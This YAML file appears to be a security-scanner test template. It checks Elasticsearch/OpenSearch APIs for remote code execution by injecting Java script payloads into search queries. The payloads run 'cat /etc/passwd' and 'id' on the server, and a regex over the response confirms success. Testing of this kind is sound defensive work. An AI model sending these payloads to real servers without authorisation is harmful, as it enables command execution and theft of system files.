---
id: FRAMEWORK_RCE_ELASTICSEARCH
info:
  name: "Framework RCE - Elasticsearch"
  description: "Tests whether Elasticsearch/OpenSearch is vulnerable to Remote Code Execution through script injection. Enabled for gl_elevate."
  details: "This test injects Java code execution payloads and OpenSearch-specific payloads into Elasticsearch/OpenSearch search queries to check if the application executes them, indicating a Remote Code Execution vulnerability. Configured for gl_elevate API."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_ELASTICSEARCH
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0

wordLists:
  elasticsearchPayloads:
    - '{ "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("cat /etc/passwd").getInputStream()).useDelimiter("\\A").next();" } } }'
    - '{ "size": 1, "query": { "match_all": {} }, "script_fields": { "command": { "script": { "source": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();", "lang": "painless" } } } }'
    - '{ "query": { "match_all": {} }, "script_fields": { "test": { "script": { "source": "java.lang.Runtime.getRuntime().exec(\"id\")", "lang": "painless" } } } }'

execute:
  type: single
  requests:
    - req:
        - modify_method: POST
        - modify_url: "_search?pretty"
        - modify_header:
            content-type: "application/json"
        - replace_body: "${elasticsearchPayloads}"

validate:
  response_code:
    eq: 200
  response_payload:
    length:
      gt: 0
    regex: "root:.*:0:0:"
    not_contains:
      - <html>
      - </html>
  response_headers:
    for_one:
      key:
        eq: "content-type"
      value:
        eq: "application/json"
